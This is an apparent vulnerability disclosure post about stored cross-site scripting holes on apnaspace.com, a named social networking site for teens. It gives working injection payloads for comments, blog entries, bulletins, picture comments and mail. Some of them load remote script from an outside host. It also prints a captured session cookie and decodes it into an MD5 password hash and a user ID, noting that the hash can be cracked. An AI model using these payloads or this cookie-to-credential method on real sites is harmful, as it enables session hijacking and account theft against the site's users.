Apnaspace.com - XSS with cookie disclosure
Apnaspace.com (A myspace type site for arab & indian teens)
Homepage:
http://www.http://www.apnaspace.com
Effected files:
* Comment input box:
* Posting a blog entry:
- Entry title
- Entry body
* Viewing a profile
* Posting a bulletin.
* Commenting on a picture
* Sending mail to someone
------------------------------------------------------
XSS vuln with cookie disclosure via posting a comment:
Since there a vulnerability in bbcode 1.23.1 and below, we can execute our XSS
example and display the cookie info by putting the following in as a comment:
[img]javascript:alert(document.cookie)[/img]
This also works when creating a new blog entry too. Just put the above
codeinasyour"entry title" or "entry subject"
Screenshots:
http://www.youfucktard.com/xsp/apna1.jpg
http://www.youfucktard.com/xsp/apna2.jpg
Our Cookie:
TIME=1150153432; switchmenu;
apnaforum_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2291da4589b012c2fe1ceac1fb2363dbc6%22%3Bs%3A6%3A%22userid%22%3Bs%3A4%3A%223462%22%3B%7D;
apnaforum_sid=2964cbd2c5a3f3d1a911fbf777c32300;
NATIO=luny666;__utma=265362911.794893539.1150148238.1150148238.1150151884.2;
__utmc=265362911;
__utmz=265362911.1150148238.1.1.utmccn=(referral|utmcsr=dmoz.org|utmcct=/Recreation/Picture_Ratings/|utmcmd=referral;
__utmb=265362911
The cookie looks pretty much the same as a few of the others I've discussed.
I'll just post whats needed:
Dcoding the Hex value of:
apnaforum_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2291da4589b012c2fe1ceac1fb2363dbc6%22%3Bs%3A6%3A%22userid%22%3Bs%3A4%3A%223462%22%3B%7D;
We get:
a:2:{s:11:"autologinid";s:32:"91da4589b012c2fe1ceac1fb2363dbc6";s:6:"userid";s:4:"3462";}
What we need:
91da4589b012c2fe1ceac1fb2363dbc6 (Our md5 hashed password, which is fuckit)
Our userid is:3462
Now lets godown to NATIO=luny666 (This is our username)
Congrats, you now know the md5 hashed pw, which can be cracked, as well as our
username from this cookie. Lets move on to other parts of the site that suffer
from XSS vulns.
---------------------------------------------
Posting a bulletin XSS vuln:
When postinga bulletin, userinput is not sanatized and filtered before being
generated. So, unlike above, where we had to use the sites standard bbcode
tags, we can just use normal html tags here. For PoC when submitting a
bulletin, try putting <SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT> in as
your bulletin subject.
Screenshots:
http://www.youfucktard.com/xsp/apna3.jpg
http://www.youfucktard.com/xsp/apna4.jpg
http://www.youfucktard.com/xsp/apna5.jpg
----------------------------------------------
Commenting on a picture:
Same ast he first XSS vuln, we use bbcode here. ForPoC try putting the
following in as your comment when rating a picture:
[img]javascript:alert(document.cookie)[/img]
Screenshots:
http://www.youfucktard.com/xsp/apna6.jpg
http://www.youfucktard.com/xsp/apna7.jpg
-------------------------------------------------
Sending someone mail:
No filtering is needed here,for PoC as your mail title or subject just put:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
---------------------------------------------------